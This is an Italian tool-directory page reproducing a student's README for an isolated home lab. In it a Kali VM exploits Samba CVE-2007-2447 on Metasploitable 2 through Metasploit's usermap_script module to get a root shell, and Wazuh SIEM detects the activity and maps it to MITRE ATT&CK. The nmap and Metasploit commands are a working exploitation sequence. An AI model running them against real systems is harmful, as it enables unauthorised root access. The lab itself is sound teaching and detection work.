Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — Laboratorio di attacco AD/Linux isolato: sfruttata CVE-2007-2447 tramite Metasploit, rilevata con Wazuh SIEM mappata su MITRE ATT&CK (T1190, T1059) | Kitploit
Strumenti/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
RicognizioneFramework di ExploitAnalisi delle VulnerabilitàExploitPenetration TestingThreat IntelligenceRilevamento IntrusioniApprendimento e FormazioneAnalisi dei Log

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Lab e Pratica
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

Laboratorio di attacco AD/Linux isolato: sfruttata CVE-2007-2447 tramite Metasploit, rilevata con Wazuh SIEM mappata su MITRE ATT&CK (T1190, T1059)

Vedi Repository
4 giorni faNon ancora revisionato
Condividi

🛡️ Lab di Exploitation CVE-2007-2447 e Rilevamento SIEM (Wazuh + MITRE ATT&CK)

Progetto B.Tech (BTP) | IIIT Pune Basato su: "Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring" — ICCCNT 2023, IIT Delhi

Un laboratorio domestico di cybersicurezza completamente funzionante, costruito su una singola macchina utilizzando strumenti gratuiti e open-source. Il laboratorio simula un ciclo di vita di attacco reale — Ricognizione → Exploitation → Rilevamento — e dimostra come un SIEM possa rilevare e mappare gli attacchi al framework MITRE ATT&CK in tempo reale.


📐 Architettura del Laboratorio

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser

🧰 Strumenti e Tecnologie


🔧 Guida alla Configurazione

Prerequisiti

  • Una macchina con almeno 16 GB di RAM (tutte e 3 le VM vengono eseguite simultaneamente)
  • VirtualBox 7.x installato
  • ~50 GB di spazio libero su disco

Passaggio 1 — Configurazione della Rete in VirtualBox

Crea una rete interna denominata cyberlab in VirtualBox. Tutte e tre le VM ricevono questo adattatore. La VM Ubuntu/Wazuh riceve un adattatore Host-Only aggiuntivo così puoi accedere alla dashboard dal tuo browser.


Passaggio 2 — Kali Linux (Attaccante)

  1. Scarica l'immagine VirtualBox di Kali Linux
  2. Importala e assegna l'adattatore di rete interna cyberlab
  3. Imposta un IP statico:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. Riavvia la rete: sudo systemctl restart networking

Passaggio 3 — Metasploitable 2 (Vittima)

  1. Scarica Metasploitable 2
  2. Importalo in VirtualBox e assegna la rete cyberlab
  3. Imposta un IP statico:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ Non esporre mai Metasploitable 2 a internet. È intenzionalmente insicuro.


Passaggio 4 — Ubuntu + Wazuh SIEM (Difensore)

  1. Installa Ubuntu Server 22.04
  2. Assegna due adattatori: cyberlab interno + Host-Only
  3. Configura un IP statico tramite netplan (/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. Installa Wazuh (nodo singolo):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. Accedi alla dashboard all'indirizzo: https://192.168.56.103 (dal browser dell'host)

Passaggio 5 — Collegare Metasploitable a Wazuh tramite Syslog

Poiché Metasploitable 2 non può eseguire un agente Wazuh, configura l'inoltro syslog per il monitoraggio senza agente:

Su Metasploitable, aggiungi a /etc/rsyslog.conf:

root@kitploit:~
*.* @10.0.0.3:514

Su Wazuh (Ubuntu), abilita l'input syslog in /var/ossec/etc/ossec.conf:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

Riavvia Wazuh: sudo systemctl restart wazuh-manager


⚔️ Simulazione dell'Attacco

Fase 1 — Ricognizione (Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

Principali servizi individuati su Metasploitable 2:

Sono state individuate oltre 20 porte aperte. OS identificato tramite fingerprinting: Linux 2.6.x


Fase 2 — Exploitation (Metasploit)

Vulnerabilità: CVE-2007-2447 — Command Injection Samba usermap_script

Consente l'esecuzione remota di codice non autenticata tramite richieste MS-RPC malformate su Samba 3.0.0–3.0.25rc3.

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

Fase 3 — Rilevamento (Wazuh SIEM)

Dopo l'exploit, Wazuh ha rilevato e mappato automaticamente gli eventi su MITRE ATT&CK:

Eventi totali rilevati: 55+

Accedi alla dashboard all'indirizzo https://192.168.56.103 → Security Events → MITRE ATT&CK


📊 Risultati Principali

  • ✅ Replicato con successo l'intero ciclo di vita dell'attacco in un ambiente isolato
  • ✅ CVE-2007-2447 ha permesso di ottenere una shell root non autenticata in pochi secondi
  • ✅ Il SIEM Wazuh ha rilevato e mappato tutti gli attacchi su MITRE ATT&CK in tempo reale
  • ✅ L'inoltro syslog ha abilitato il monitoraggio senza agente del sistema legacy Metasploitable
  • ✅ L'intero laboratorio gira su una singola macchina host con 16 GB di RAM

📁 Struttura del Repository

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 Riferimento

Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.


⚠️ Dichiarazione di Esclusione di Responsabilità

Questo laboratorio è costruito interamente su macchine virtuali isolate, senza accesso a internet durante le simulazioni di attacco. Tutti gli strumenti e le tecniche vengono utilizzati esclusivamente a scopo educativo in un ambiente controllato. Non tentare di replicare alcuna tecnica di attacco su sistemi che non possiedi o per i quali non hai ricevuto esplicita autorizzazione al test.


Presentato da Harshita Verma | IIIT Pune

Scarica lo strumento
VMRuoloIPStrumenti
Kali Linux 2026.1Attaccante10.0.0.1Nmap, Metasploit
Metasploitable 2Vittima10.0.0.220+ vulnerabilità
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5
StrumentoVersioneScopo
VirtualBox7.xHypervisor — esegue tutte le VM su un unico host
Kali Linux2026.1Sistema operativo per test di penetrazione (offensivo)
Metasploitable 2v2.0Target intenzionalmente vulnerabile
Wazuhv4.7.5SIEM open-source (difensivo)
NmapUltimaScansione di rete/porte
Metasploit FrameworkUltimaFramework di exploitation
PortaServizioVersione
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
ID RegolaDescrizioneTecnica MITRETattica
5402Esecuzione riuscita di sudo verso ROOTT1548.003Escalation dei privilegi
5501PAM: sessione di login apertaT1078Accesso iniziale / Persistenza
5502PAM: sessione di login chiusaT1078Evasione della difesa
502Server Wazuh avviato—Rilevamento attivo